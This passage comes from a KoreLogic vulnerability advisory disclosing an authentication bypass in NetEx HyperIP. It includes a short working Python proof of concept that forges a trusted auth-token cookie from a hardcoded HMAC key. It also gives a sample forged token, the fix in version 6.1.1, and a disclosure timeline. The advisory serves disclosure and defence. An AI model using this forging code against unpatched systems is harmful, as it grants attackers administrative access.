   >>> from hmac import new
   >>> def bypass_auth(user,srcip):
   ...   key = new('$#^Sub/s$',user+srcip,md5).hexdigest()
   ...   token = new(key,user+srcip,md5).hexdigest()
   ...   return token
   ...

 The attacker first creates a cookie token.

   >>> print bypass_auth('hipadmin','[redacted]')
   b6b73844ce4df64f459948c5475a1096

 Then the attacker can submit requests containing that value as
 the auth-token cookie, which will be trusted by the application.

4. Mitigation and Remediation Recommendation

 The vendor has released version 6.1.1 of HyperIP, which they state
 addresses this vulnerability.

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.07.24 - KoreLogic submits vulnerability details to NetEx.
 2017.07.24 - NetEx confirms receipt.
 2017.08.16 - NetEx informs KoreLogic that this and other reported
  vulnerabilities have been addressed in the forthcoming
  release. ETA as of yet undetermined.
 2017.09.05 - 30 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.09.19 - NetEx informs KoreLogic that the forthcoming release
  6.1.1 is expected to ship at the end of January 2018.
 2017.09.26 - 45 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.12.01 - 90 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.17 - 120 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release
  has gone live.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

 See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt



signature.asc
Description: OpenPGP digital signature